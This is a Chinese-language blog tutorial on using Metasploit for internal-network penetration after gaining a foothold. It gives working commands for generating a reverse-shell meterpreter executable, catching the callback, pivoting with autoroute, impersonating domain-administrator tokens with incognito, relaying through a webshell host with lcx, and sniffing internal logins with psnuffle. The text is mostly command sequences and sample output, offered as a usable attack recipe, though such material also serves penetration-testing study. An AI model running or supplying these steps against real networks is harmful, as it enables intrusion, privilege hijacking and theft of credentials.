Metasploit之内网渗透

颓废 2019年5月19日10:07:55评论491 views字数 2185阅读7分17秒阅读模式

Metasploit之内网渗透

------------------------------------------------------------------------------------------------
(一)在已经有某目标的情况下,对该目标的内网进行的渗透
参考文献:参考文献:http://www.2cto.com/article/201410/339765.html

前期步骤参考
09-Metasploit之我的远程控制软件
21-Metasploit之多种后门生成

首先需要一个目标,举例如下:

(1)生成一个木马文件(假设本机IP:192.168.2.146,端口:1234)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=你的端口 -f exe -o payload.exe

(2)msf下使用反弹连接
msf > use exploit/multi/handler

(3)设置反弹需要的payload
set payload windows/meterpreter/reverse_tcp

(4)查看配置选项
show options

(5)设置反弹回来的我们自己的主机IP和端口
set lhost 192.168.2.146
set lport 1234

(6)目标主机打开木马程序文件payload.exe,得到反弹shell
meterpreter > 

接下来的步骤就是对于这个目标主机的内网渗透的步骤了:

run get_local_subnets              -->获取目标的网卡信息

run autoroute -s 192.168.2.0/24    -->扫描有效网卡的整个C段的信息

run autoroute -p                   -->查看域环境,DOS下的查看域的命令是“net view”

劫持域管理的方法

use incognito                      -->调用劫持域管理模块

list_tokens -u                     -->查看当前目标主机的域环境信息

PS:当前我的测试环境是不存在域的,所以返回信息如下
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
GOS-01601281118/Administrator
NT AUTHORITY/SYSTEM

Impersonation Tokens Available
========================================
No tokens available

这里我假设我的域管理是这个“GOS-01601281118/Administrator”,那么接下来的劫持是这样的

impersonate_token GOS-01601281118/Administrator    -->劫持域管理

如果劫持成功,那直接可用“shell”命令,获得域管理的shell

PS:内网域渗透参考
http://www.freebuf.com/articles/web/5783.html
http://www.freebuf.com/articles/web/5901.html

------------------------------------------------------------------------------------------------
(二)web渗透测试中,有webshell的情况下,目标服务器和自己都是内网,关于转发的msf技术
参考文献:http://www.freebuf.com/articles/web/42208.html

1.在公网ip机器上(thinkpad物理机,ip:192.168.253.1)使用lcx建立监听两个端口300,200

2.在metasploit中使用exploit/multi/handler模块,利用payload windows/meterpreter/bind_tcp 连接公网ip的300端口。(这相当于在公网ip上执行了windows/meterpreter/bind_tcp模块,绑定的端口是200)

3.制作一个msfpayload 模块选择windows/meterpreter/reverse_tcp,连接公网ip的200端口。这样可以将两个机器进行连接。

4.接着执行payload

5.获得一个meterpreter控制台,可以开始进行执行命令了。如果你觉得命令行用着不爽,可以直接使用run vnc命令,获得一个gui操作

------------------------------------------------------------------------------------------------

内网嗅探的使用

use auxiliary/sniffer/psnuffle    -->使用嗅探模块

run                               -->运行开始嗅探

此时内网中的一些登陆就会被嗅探到账户密码信息

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:07:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之内网渗透http://cn-sec.com/archives/67374.html

发表评论

匿名网友 填写信息